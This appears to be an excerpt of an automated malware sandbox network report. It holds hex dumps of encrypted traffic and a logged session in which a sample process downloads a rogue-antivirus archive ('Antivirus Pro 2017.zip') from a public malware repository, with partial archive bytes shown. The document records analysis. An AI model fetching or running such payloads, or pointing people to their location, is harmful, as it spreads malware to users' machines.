                                                                                                                                                            2022-09-29 12:45:03 UTC9521INData Raw: 5a 8b a3 79 2c 3a 7e 43 45 03 01 28 15 c5 10 9f 75 80 3e 37 76 bc e4 86 ee 10 1c 39 e5 5c 30 a4 bb d4 93 5d 06 7b da 47 a4 ac a6 d9 52 62 8a 20 41 2d 38 5d a7 c1 02 48 ae 30 d2 a1 e6 2e f4 a2 3f 6d d0 4d d1 5d a1 55 a6 56 48 5a ff fa af 1a e9 73 59 c2 a5 c8 0a f0 66 6c 54 b7 0a c6 65 71 fd 9a fb 0b 43 6e bb c7 c3 1d ab 58 5b 0f 35 3f 79 cc 08 c7 40 4b bb 83 d3 1c 37 f2 48 4a 84 73 a7 a5 5d 4c 63 43 69 6a ca 4d 11 d5 cf 40 43 a4 cd bf 89 c7 61 0b b5 1b d9 81 e4 e9 fe d7 2b 56 76 57 3d dd 42 fb 6b c2 89 e2 93 86 1d be 50 2a bc c0 f0 fb e9 eb ce b5 69 43 62 cc 27 5c 7c 3c b5 26 87 7d cc 50 9a ec 03 48 15 68 da 88 2a 94 10 8f 50 6a 88 e6 97 9d 63 2f 58 0e 33 20 75 60 5a 43 82 42 1b 56 cb b8 12 c2 41 f7 e7 8a e2 df 30 3f 0c 00 3a 3c 48 de 92 3d 3d 67 88 73 c5
                                                                                                                                                            Data Ascii: Zy,:~CE(u>7v9\0]{GRb A-8]H0.?mM]UVHZsYflTeqCnX[5?y@K7HJs]LcCijM@Ca+VvW=BkP*iCb'\|<&}PHh*Pjc/X3 u`ZCBVA0?:<H==gs
                                                                                                                                                            2022-09-29 12:45:03 UTC9537INData Raw: a0 ba b4 82 59 e1 27 75 d7 5b 34 d9 51 06 08 61 af 7c 18 64 87 5f 3e 73 2c 3f 7a 80 90 9e 6b 54 0e c5 b7 87 30 87 00 e5 b6 69 d0 23 24 08 35 af 67 8a 83 90 1c 78 1b 11 d5 7d 9b 71 b7 99 3e 9e aa 67 78 0e 86 70 82 ad 59 5e 40 9e fd 4c 27 90 77 18 63 64 f4 ae fd 5d bd 4d 39 56 3b 4a 5c ed 56 e0 7d 09 34 56 b8 2f 05 6d 84 e0 04 c3 a4 72 74 3e 67 bc e4 03 c2 06 a8 fc d2 91 a3 59 73 7e 3c 93 c0 4e b6 6d 97 a4 18 94 56 b2 78 aa 13 7a 64 35 4d 11 da 70 66 b8 e4 e3 67 75 0e 8e 50 c6 87 7b c3 08 be 00 1f f5 60 01 c8 56 4d da 4d ea 8a ec bf 6c 6c 6f 6b 2e c1 bd ac 3d 8f 97 24 b4 37 6b 0c 3c 8a 54 68 a0 26 ea f1 27 bc d5 1f 52 84 c9 d5 5e f3 8b a3 5d 3a b0 2a 4a 95 23 2e 67 1f 9d 17 d4 5f 6d 7d 0d 85 6a dd 3b a5 de aa 6d 2f bb b5 53 2d 80 25 ac 16 96 27 4a 7c cb 14
                                                                                                                                                            Data Ascii: Y'u[4Qa|d_>s,?zkT0i#$5gx}q>gxpY^@L'wcd]M9V;J\V}4V/mrt>gYs~<NmVxzd5MpfguP{`VMMllok.=$7k<Th&'R^]:*J#.g_m}j;m/S-%'J|
                                                                                                                                                            2022-09-29 12:45:03 UTC9553INData Raw: 51 f1 85 3d 2b e1 4d 57 0b 5e 06 33 87 c2 ce c8 de 93 83 c9 9d 4c 58 99 74 07 e6 f0 d2 3d e8 ec 58 14 40 ae e0 28 02 16 a6 1c d2 a1 e0 f9 63 7b 49 8c f7 53 a9 fe 12 3f ca 30 e8 6a 67 77 79 c5 c5 5c c3 3b 09 51 33 70 08 17 e8 08 cc 42 03 3b ac 30 ec f3 2b 66 bb 12 dd 9e f3 95 b9 7b ab 20 45 d3 b1 7b 9d bf 51 09 27 92 05 73 e0 75 05 be 4b fd 95 31 17 a1 f9 fc c0 b0 67 4d b6 1a 14 2e f4 13 e3 95 34 58 7f 01 a5 b7 ad a9 73 77 ee 46 72 f7 6e 02 7a 28 8e bc 7b fb 99 40 db 11 04 70 33 bc 29 54 89 e8 af 20 54 aa 55 5a 28 00 7c a3 14 45 d5 aa 2f b0 70 e4 dc f2 19 4a 59 88 7d cf 4e 38 57 26 0e ed f0 7c f8 23 ec c1 0b 17 40 63 28 5f a3 4c 9a a4 60 66 86 9c 79 c8 6d 77 f2 51 e1 3f 67 dc 32 fd 00 40 ff 79 6b 19 7f ef 28 64 d8 bd f8 4d 32 a1 6a 21 4d a8 38 e7 a7 46 e9
                                                                                                                                                            Data Ascii: Q=+MW^3LXt=X@(c{IS?0jgwy\;Q3pB;0+f{ E{Q'suK1gM.4XswFrnz({@p3)T TUZ(|E/pJY}N8W&|#@c(_L`fymwQ?g2@yk(dM2j!M8F
                                                                                                                                                            2022-09-29 12:45:03 UTC9569INData Raw: 21 b7 40 c5 0e 98 76 ee a4 1c 83 fa ae e5 65 44 d0 32 14 3e 5e 6d 5b 17 09 5b 5b 6a 6a 53 03 a9 8c 31 99 dd 0c b6 d3 92 cc d3 55 49 f4 5a 4f 47 1e be 73 0c af c8 7f cc 4c 1a 45 60 4f 2c 02 6f 0c f5 88 89 5c f4 37 64 69 f1 e3 09 51 7c 60 b0 8d c3 21 a5 cb cc 29 d4 a7 52 e1 47 23 28 3d 6b 14 5f d7 3b 26 fb b5 42 f9 a3 71 06 01 88 50 31 77 12 64 c8 6b 61 33 01 25 8f 5e 78 ef ef a5 66 ea 42 d5 6d 41 1e b4 86 f2 68 fe f2 74 c5 9c ce 99 ae 16 3c ef 19 d2 1f 20 65 72 e9 69 20 95 80 c4 67 b5 9e 7f 3d 1d a0 17 23 06 14 98 e5 58 9b 89 db e5 28 92 29 45 80 f7 42 a5 b8 96 b8 5e 9d ff 1a b5 d1 24 1f e8 75 13 f0 bf 69 fe 0c 61 96 5b 83 51 a2 de f3 6c 49 f0 9f 99 32 01 7f 78 f7 4b 84 1c 15 76 59 77 41 e7 c5 82 cf 3f e4 b2 7d ba 68 5f d9 88 a4 e5 fd cd f6 8a b4 41 69 13
                                                                                                                                                            Data Ascii: !@veD2>^m[[[jjS1UIZOGsLE`O,o\7diQ|`!)RG#(=k_;&BqP1wdka3%^xfBmAht< eri g=#X()EB^$uia[QlI2xKvYwA?}h_Ai
                                                                                                                                                            2022-09-29 12:45:03 UTC9585INData Raw: 79 4b 9a 6d a6 84 3b 52 9a 4f b3 2f 10 3e 8d 89 21 38 5a dc e4 d4 f8 d8 c2 fb 76 04 9c e5 52 6f 98 d8 9e d7 90 93 11 2b b7 16 ca bd 2f 06 14 a1 59 aa 2e 9f f1 e3 8d 61 f2 ec 85 7c 1a 12 aa 92 fe c7 83 b2 9f 8a 57 56 fa a7 97 0f 19 fb 55 37 73 5a 63 ab 8f b0 d1 3d 87 2e c6 3c 7d 41 a5 16 2b ea cc 63 aa b2 ad 9d 5a e7 7a 67 7f d1 ff b2 26 df 72 0c d4 1c ea 3c df dd 1d 43 69 0f cc 36 4d e5 91 32 d1 8e bb 9c 82 2f c6 ee f6 e0 c5 48 ac 7a 0f 34 ef 90 41 7a 5b ae 3b b4 05 80 4a 95 ec 08 43 51 b0 c8 01 0d c1 9d 68 b4 52 d5 08 e3 82 2e 64 fe 5f 57 db 38 9f 51 c2 f4 bd e1 ca 00 10 0d 58 27 50 52 57 ce 4d 18 c0 3b 1b d9 21 ff cf c7 7f d3 ce 45 58 ca e9 64 e7 c4 e0 f0 25 6e 5e 36 df 26 60 f5 0c f4 24 cc b7 be 0d fe 6f e2 89 9e 78 f5 1e 6f 17 44 32 36 4b 38 9d 75 d8
                                                                                                                                                            Data Ascii: yKm;RO/>!8ZvRo+/Y.a|WVU7sZc=.<}A+cZzg&r<Ci6M2/Hz4Az[;JCQhR.d_W8QX'PRWM;!EXd%n^6&`$oxoD26K8u
                                                                                                                                                            2022-09-29 12:45:03 UTC9601INData Raw: 01 c2 80 17 f8 ce 1a 54 39 99 b1 9d e4 05 23 6c 1c e4 62 ed 72 7a 44 e9 f8 b2 13 e2 d1 e8 f0 2d d4 74 9d cc 25 c3 f2 0f 54 31 73 12 30 6c 93 4f 4d 92 18 15 59 eb ff bc 30 ff 1d 43 3e 24 ff 71 b5 aa 84 ce 83 f4 69 25 78 24 c1 5e 84 f8 1b 34 79 31 99 b7 81 78 2a 25 95 74 d2 3b fc bc a9 ed ef ee 60 81 19 7a 24 3d 36 cd 6b ca aa 41 11 45 48 18 30 ed 38 f4 35 62 08 56 05 a7 54 a4 7d 6e 0f d0 34 08 f8 9f 75 66 e6 f8 8f 75 52 a9 b6 39 d9 de 04 25 ec 77 c6 7c a3 a9 cb a9 35 e2 fa 7f 76 2a 63 b1 66 af 22 82 43 b9 d6 0e 1b 92 36 8e 44 10 e3 38 b9 18 f8 34 02 af 2c 95 fb 75 10 ff e1 47 cf 5b c9 99 71 01 4f a4 3b 4e 31 f0 88 ce 9b 74 c3 0a 4e 8c f7 d5 0e 88 5f 62 46 79 74 64 88 42 0a 97 dc 4b 91 54 47 1f 65 21 1a 20 e0 60 b5 98 09 9d ee 2d d2 fb 69 7b a6 7d c4 55 96
                                                                                                                                                            Data Ascii: T9#lbrzD-t%T1s0lOMY0C>$qi%x$^4y1x*%t;`z$=6kAEH085bVT}n4ufuR9%w|5v*cf"C6D84,uG[qO;N1tN_bFytdBKTGe! `-i{}U
                                                                                                                                                            2022-09-29 12:45:03 UTC9617INData Raw: dc 26 e4 10 44 c5 f9 c2 28 ea 1b af 24 19 81 bd f7 c9 0e 0a 30 65 cf f2 4a c7 c7 57 25 e4 95 b2 07 d5 3e 09 52 08 1f 33 46 e3 5e 92 3d 6f 44 9a e1 32 54 5c 27 8e a5 f9 86 da 77 59 a9 c5 1c f8 50 d4 a6 bc b6 78 98 22 fc 79 8c 07 77 9d 5f 79 4b 82 87 ab 79 78 0d cd ce e3 3b f2 f6 e2 b2 9a 19 92 95 71 6e 45 00 d1 6b 66 a8 78 ce eb 3c c7 b2 b9 1e 09 4c 14 9f e8 24 a6 9e 7e e5 08 4e 88 8f 6c 3e 54 c2 cf 50 37 3a 16 9a c0 34 a8 3e 4b 18 ba 1e 5f 9a 7a d2 d4 10 3a ed 37 4b 5f 41 c8 c8 a6 af 27 51 96 ad 99 8f 24 a2 64 8d 4b d3 98 68 57 62 75 10 ac 34 54 54 be 35 5c d6 9a b4 b7 22 d3 1f c5 e0 20 3c 9f b4 91 ff 69 fb db ec bc d3 12 eb 42 2e b0 5b 35 8a 2d dd f7 98 a8 fc 95 07 e3 9d 54 52 a6 f7 fb e2 e2 12 d2 aa 32 7c a8 7f ec 57 01 b0 c8 92 a9 e6 32 9d 1f 9d a8 bd
                                                                                                                                                            Data Ascii: &D($0eJW%>R3F^=oD2T\'wYPx"yw_yKyx;qnEkfx<L$~Nl>TP7:4>K_z:7K_A'Q$dKhWbu4TT5\" <iB.[5-TR2|W2
                                                                                                                                                            2022-09-29 12:45:03 UTC9633INData Raw: 03 b5 f2 66 2e 9c 3f 22 bf 28 30 4e 64 a8 8a 15 b4 a5 bb 88 74 a9 56 89 54 fa 32 52 7b 06 07 57 a6 6b e0 07 08 27 03 ec 9a 29 ec 7f 3d c7 61 fe 5a 3e 04 b2 dc 44 fc 92 bb ac 30 ea ff 2e 58 66 48 3d 95 ef 1c 24 bb 51 76 2d b6 e8 fa 21 6a f6 14 d2 73 d0 7b ca af f1 e3 a3 df 5c 8e b9 0b c3 8d 89 a4 a6 1d d1 34 8f 55 54 82 59 60 8f 6a f3 3b 44 0b e2 ab 86 03 ff 55 bf 91 cd 3c 95 99 94 6d 81 cd 45 c8 24 7a 92 e9 c4 ff 70 60 ab d8 53 6d 6e 27 09 1f 54 eb 9d 14 6b d5 35 25 7b 0d 88 93 be db 5d 92 5b 26 f0 54 ab a4 7b 24 2a c9 51 a0 f0 68 3d 82 fd d1 b5 17 87 00 c4 01 18 79 03 f9 e7 36 2e 4a c0 65 3b 40 72 e4 0f dc 2d 0b 52 09 75 ea 8e c6 17 18 44 77 cf e5 8a a0 2d 1f c5 64 49 66 40 4b d2 af b4 59 d3 35 9a 39 3c fa 27 b2 3c 86 ed 65 7d 40 7b 29 29 61 1a 2a 1b 56
                                                                                                                                                            Data Ascii: f.?"(0NdtVT2R{Wk')=aZ>D0.XfH=$Qv-!js{\4UTY`j;DU<mE$zp`Smn'Tk5%{][&T{$*Qh=y6.Je;@r-RuDw-dIf@KY59<'<e}@{))a*V
                                                                                                                                                            2022-09-29 12:45:03 UTC9649INData Raw: fa 52 e5 6d 98 2c 54 dd ac 82 ad d1 0f b6 23 ef b7 01 0a 73 10 2d 83 fd c4 aa 99 70 9a bf 0d 15 ea 2e b3 db 5f 90 a4 8f 43 79 dd 62 8e d3 ae 29 a7 45 0f 4c 70 c7 17 4f 3f cf c4 02 c5 27 2f c8 2e b9 21 9f 04 bf e3 96 e9 15 80 25 f0 10 31 45 e1 f6 bd 66 11 d8 54 0b 43 c3 be 1b 5d da 32 7e 90 d4 fb 1e 7e 2a 21 59 34 0e 1f 7c 1f 11 f1 af 72 38 79 cb 3a 8c 12 02 3d 89 99 68 d8 6f bc a4 ee e3 39 fe 89 27 ea 5b f8 c7 f6 e2 94 3e 44 68 01 59 77 e6 ef 01 b6 b0 a8 65 5c 0c 28 e1 76 e3 c3 63 94 d2 61 0c a8 19 9e bb bb 8b fb 0e cb 41 b0 83 57 34 67 62 a5 aa 84 0f 4a fd 9c 15 c2 1f aa 4c 8c da 94 ab 82 03 4e 3c 2d ed 71 ba 84 3d 59 3c bf 9f 9c 68 1b 64 6c ca 47 ce 35 db bf bd 48 c0 ee 21 f1 52 70 45 6f 30 3f 8c 33 63 24 ab cb 13 5f 02 0e d2 02 40 86 31 fa bd 10 d9 6a
                                                                                                                                                            Data Ascii: Rm,T#s-p._Cyb)ELpO?'/.!%1EfTC]2~~*!Y4|r8y:=ho9'[>DhYwe\(vcaAW4gbJLN<-q=Y<hdlG5H!RpEo0?3c$_@1j
                                                                                                                                                            2022-09-29 12:45:03 UTC9665INData Raw: 48 4b b6 78 87 3b 3a 2a 96 8c 6d cd 13 40 e1 5f 05 5e c1 74 6c 58 14 69 a9 6f 7e 82 52 75 42 78 91 68 7b 73 79 ba 88 f5 23 5d d3 00 fd a3 26 23 0b f3 d5 9d d6 2e 57 92 b0 a5 13 4a d0 54 8b 28 07 67 fb 22 c9 03 d7 06 88 9e 4a 1f 93 b7 2a fe 14 b7 c9 be 93 b2 42 43 8b 90 07 f1 bf 5c f2 ae e6 42 56 24 ea d3 7d 11 6b 24 43 0c 9c 70 af fb 5f 38 6c 58 29 7b e1 de d0 84 8a 0b 4a 2c f3 5e 53 43 f8 4b 0e a9 3c 8a af 32 55 d6 0d 4c d6 9a 6b 03 ba e5 80 cb 17 6b e2 e5 9f 14 93 91 fc 2e 17 51 87 11 64 40 40 4e 96 b4 63 45 2b 78 8e ac 68 cd 9c 7e f2 2d b9 b2 ee 0d 8f 7a ab b2 3f 05 a3 cc a5 03 ef da 33 dd 19 b4 7d f0 a0 e9 99 f9 64 5e 62 2c b0 52 93 4c f5 8c 73 38 df 87 38 7e e4 c9 e8 8f f4 54 40 db dd 1b ae bc 5a a9 36 70 1d 24 10 b7 b5 81 f7 c2 fd 72 ef d8 10 93 3c
                                                                                                                                                            Data Ascii: HKx;:*m@_^tlXio~RuBxh{sy#]&#.WJT(g"J*BC\BV$}k$Cp_8lX){J,^SCK<2ULkk.Qd@@NcE+xh~-z?3}d^b,RLs88~T@Z6p$r<
                                                                                                                                                            2022-09-29 12:45:03 UTC9681INData Raw: 3f 7a 72 cd a0 b6 48 61 2e 27 6d 25 95 9b f3 47 77 51 c3 37 8d 3c cc 9b 69 8a 88 5c 0d 9f 78 11 f7 36 8a 82 58 e9 ce 18 9a 0c 07 c5 66 ec 44 f8 71 3f cf 5f 05 17 6c 5f f9 45 1e b7 d2 7a fb d7 9d 45 be a6 97 6d fb a9 b1 0d b8 52 12 79 8b ef 2a 57 72 77 c1 ae e3 41 2c 2c 27 47 6d 69 ce ad 6f 26 86 41 f0 19 62 12 ff 1b a6 8f 08 db 92 e8 3b 76 40 03 b8 f5 7d 31 73 9c 4e 02 6d 23 4c f2 89 31 e2 ec 63 23 d8 b3 58 6a 55 2d 7e dd a8 93 5b 99 75 5e 24 23 ea fa 16 4b c8 15 0c 1a 8a 61 eb 6b 15 b1 e5 06 3f 3c 0e ea 7f ff 57 fa c8 1a 92 44 b7 ac 23 ca d5 d5 75 7e 6f 41 bc 78 9b 50 70 67 06 b3 27 c1 00 58 ca 6e c0 9c a6 09 36 0e 2e b5 84 c9 0f 72 78 39 7d 70 c1 74 44 4f 28 25 ed 80 78 52 bb 67 d7 0d 08 e8 b2 e9 2f 2e c0 6a 4e 56 c9 a5 cf 8a 9e 41 d9 43 ab 77 bf 49 ed
                                                                                                                                                            Data Ascii: ?zrHa.'m%GwQ7<i\x6XfDq?_l_EzEmRy*WrwA,,'Gmio&Ab;v@}1sNm#L1c#XjU-~[u^$#Kak?<WD#u~oAxPpg'Xn6.rx9}ptDO(%xRg/.jNVACwI


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            66192.168.2.649741140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:03 UTC9684OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            67140.82.121.4443192.168.2.649741C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:03 UTC9684INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:21 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:03 UTC9684INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            68192.168.2.649742185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:03 UTC9686OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            69185.199.110.133443192.168.2.649742C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:03 UTC9686INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 813771
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "1678d463fe21840e0502334b52db05d49c7f0867ee8fb74db3e4927c4d982da5"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 3596:11E0C:3902DE:4007EA:6335934F
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:03 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6922-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455504.551911,VS0,VE226
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: a9dd1146f1b5f5b6b2a707125ce111e4814c74f6
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:03 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:03 UTC9687INData Raw: 50 4b 03 04 14 00 01 00 08 00 cc 71 b9 46 6e c1 a3 ac 07 6a 0c 00 55 c0 0c 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 72 6f 32 30 31 37 2e 65 78 65 25 07 aa cf 03 18 83 7f 90 f2 82 f4 4a c8 91 04 12 f4 c4 35 54 d1 11 fd 0b 95 82 b9 13 b7 bf ef ba 38 2e 1d 4b d8 08 b2 b2 43 b5 a3 c0 d7 77 ed 2b c1 26 7f 20 26 33 e5 c7 4d 54 26 f0 44 95 ed 24 60 75 a5 2f 65 d6 52 1e 72 1c ea 7f a8 b3 3d 44 30 b5 dc dc db 90 fe 82 c7 fd 4f 86 8d 27 85 b6 72 8e ae 12 2a ad b0 25 90 de 7a 75 d2 aa 99 19 f6 fd 5d 6e 54 90 91 de 62 38 63 db c3 14 35 94 7b 01 85 fb c5 24 57 65 48 4b 7c b8 4f 63 62 d8 e8 e9 04 68 da 36 23 dc 71 44 85 2a 59 00 ea 11 b8 97 f1 d7 5c 82 74 12 86 14 b2 3f 6d 49 f9 0b 3b d7 5f 0f 8d 62 6d f9 90 02 8f e6 1d e4 fc 16 80
                                                                                                                                                            Data Ascii: PKqFnjUEndermanch@AntivirusPro2017.exe%J5T8.KCw+& &3MT&D$`u/eRr=D0O'r*%zu]nTb8c5{$WeHK|Ocbh6#qD*Y\t?mI;_bm
                                                                                                                                                            2022-09-29 12:45:03 UTC9703INData Raw: 0c a8 6b 98 f1 a1 91 c8 1a 55 bd e3 04 b4 8c 7e dc 05 f1 fc 37 bd 0f 49 04 04 9a 68 f8 ff 85 17 40 01 d3 ae 96 f5 20 01 d3 62 1b c2 f7 15 1a 74 a9 51 12 52 eb 7b 3f 1f eb b4 ee 18 a6 b9 dd 37 b2 a6 be 18 46 b5 76 e5 67 46 31 71 52 9e b4 91 da 43 6a cf 36 75 85 a2 d1 05 68 fe 2c 97 61 eb 5c 18 96 d8 42 95 44 c6 f9 a2 a4 c8 b8 28 c4 3f 1c 75 17 77 c2 10 6d bd 21 03 bb ce b3 49 5d 2f ee 0e 78 58 e7 f9 ef 2a 88 ec ce c8 50 1b 5b 87 97 4d 2e f1 d6 0c f7 12 3d 1e 3f dd 83 ef 08 16 05 4c 65 ac a1 b7 2b 57 c7 47 06 41 d8 6d b7 d3 fb 78 80 b1 15 72 9d 14 94 f7 11 1e 36 31 42 9e 56 dd a7 b5 56 7b 10 da 9d c2 19 40 53 9f f5 ba e4 8c 9e 9c 88 75 eb d1 85 b9 c1 34 fd 54 e0 d1 30 f4 3f 2a 54 bb f0 94 1d d2 11 f8 f4 04 1c 77 b5 b7 47 0b 13 8b c2 a0 e0 79 50 9a 0d 94 d2
                                                                                                                                                            Data Ascii: kU~7Ih@ btQR{?7FvgF1qRCj6uh,a\BD(?uwm!I]/xX*P[M.=?Le+WGAmxr61BVV{@Su4T0?*TwGyP
                                                                                                                                                            2022-09-29 12:45:03 UTC9719INData Raw: 3d d6 53 78 bc 33 30 98 32 28 9f a6 46 63 95 16 a8 9a 64 e3 47 6e 97 cf c8 e1 59 d1 5a 59 df f8 6b ce 35 e5 73 7e f9 13 e5 b1 0f 71 f1 00 71 77 79 80 ea ff 7e 86 f8 10 fb c3 44 5b 11 44 b6 33 b0 2b bb 77 81 84 43 76 61 4e f2 55 4e c4 4b 2d 59 9b 34 5b d1 53 0d 11 7d 23 3c 71 65 7a b6 5d 8f 8b 91 6c 8f 55 eb e5 3d f2 a4 73 d0 13 1c 63 a1 4f b2 8b 07 0f c4 8f bb b5 ba 9d e0 66 1d b7 2e 1d e5 c6 96 fd 5a a0 49 30 0c 7c 23 a7 f2 08 4e 0f 13 a9 80 fc a3 c9 59 bf b5 8f dc c5 0e 73 ad 52 9b 99 c4 8a 47 e4 35 04 e4 f5 c4 0e 19 f6 e6 19 1f f5 9e 6e 82 7e c8 ed e3 b0 20 30 d0 42 d6 0f 2a b7 e1 d6 2b ae 13 bf 6f c8 af ea fa f7 6a 8c a3 ee 58 b2 8d 74 e9 63 91 18 ae c2 bd 98 fd 01 96 59 5a 89 62 57 93 81 0e 6b 33 e6 85 22 0e 22 fe 5a 17 83 83 b5 ff 08 58 c0 2d cb 23
                                                                                                                                                            Data Ascii: =Sx302(FcdGnYZYk5s~qqwy~D[D3+wCvaNUNK-Y4[S}#<qez]lU=scOf.ZI0|#NYsRG5n~ 0B*+ojXtcYZbWk3""ZX-#
                                                                                                                                                            2022-09-29 12:45:03 UTC9735INData Raw: 5d 01 89 14 43 87 ce cd 18 85 77 72 8f 59 09 39 1a e6 27 6d 83 61 fd 1a 38 cd 18 10 08 c8 60 1f 07 5c 62 e3 bc fc ef 52 67 74 fd a4 7d 30 8b 20 54 7d 32 5c 6d 6c ec d6 0e 61 2c 9e 84 35 19 30 20 55 08 92 da 68 2d bf 5d da f8 0e a6 5b c4 f4 b8 1a e0 d5 17 5d 49 a8 ab a6 23 fe ac 52 79 89 a7 2f bf 3c 4a be 77 4a d1 38 7e c2 67 79 b7 c5 9e 18 98 66 8f 1c 46 e0 52 77 04 63 4c 45 b8 75 b3 dd 5c 96 a9 eb 5b ef 36 00 eb 6e 8f ac a8 3c 2f 1b 87 f2 f3 b6 5b e2 bf 22 c2 90 fe 56 98 fa 92 8f e7 6d b2 fc 2f b8 ce c4 8f 04 62 6f 82 d2 fe 63 c4 04 3c d4 cd 7b 19 1b 7e dc 17 78 bd a9 27 47 6d f6 63 7e e4 09 49 68 18 cf 10 32 ec 59 e0 6c 3d 54 1b b9 91 f0 7f ee 4c a1 77 a6 03 ab 2e 32 91 fc f1 4a 63 df bf fd 0b a6 4a 5d cb 6b ac 13 5a 87 10 99 6d 0a 45 c6 7a 96 8f d6 9a
                                                                                                                                                            Data Ascii: ]CwrY9'ma8`\bRgt}0 T}2\mla,50 Uh-][]I#Ry/<JwJ8~gyfFRwcLEu\[6n</["Vm/boc<{~x'Gmc~Ih2Yl=TLw.2JcJ]kZmEz
                                                                                                                                                            2022-09-29 12:45:03 UTC9751INData Raw: 09 1a 02 46 3d eb ac 46 73 e4 83 c9 88 93 db cc f5 0c 49 3f 58 65 af b0 7e 4e 86 a0 5b d1 1c e7 fb 7c 8c 22 cf f0 1e f8 83 09 4d b9 09 ce 1e 3e 39 de 2a 57 3f 70 d0 08 39 88 f2 81 0c 60 29 a0 3a 0e 10 22 06 2b 2f a5 09 74 38 0e a6 94 75 0e d2 d5 41 80 3a 05 06 3a f9 a2 64 36 a6 ed 21 a7 ae c5 ce 27 75 a4 f0 5b 7e cf 5f 06 63 c8 44 ba 09 a8 cd 4f 3d ee d3 d0 60 6e a4 30 b1 14 b5 9c d7 20 00 bc 8f 43 4c 5a a4 81 df 9a 72 62 08 51 30 fb 5b 24 08 01 06 91 f0 7f 52 83 f3 44 7d 1b 75 73 b6 2a f2 ca f5 8f c9 55 b0 9a 47 05 8b ce b0 2e 6f 18 bd 62 db 60 a7 a4 51 cb 69 f2 79 31 30 8b 34 82 51 70 fb c1 4f 62 d2 d9 5d a2 e2 fe bd 48 b4 3f 04 eb 3f 33 ba d3 dd 2e f2 5a b9 ad 10 1e d9 0f 5c 5c d7 38 a0 c0 c4 36 dd 89 3b fe ee 1b 5a 2d 73 86 ff 3b de c7 bf 74 fd 96 36
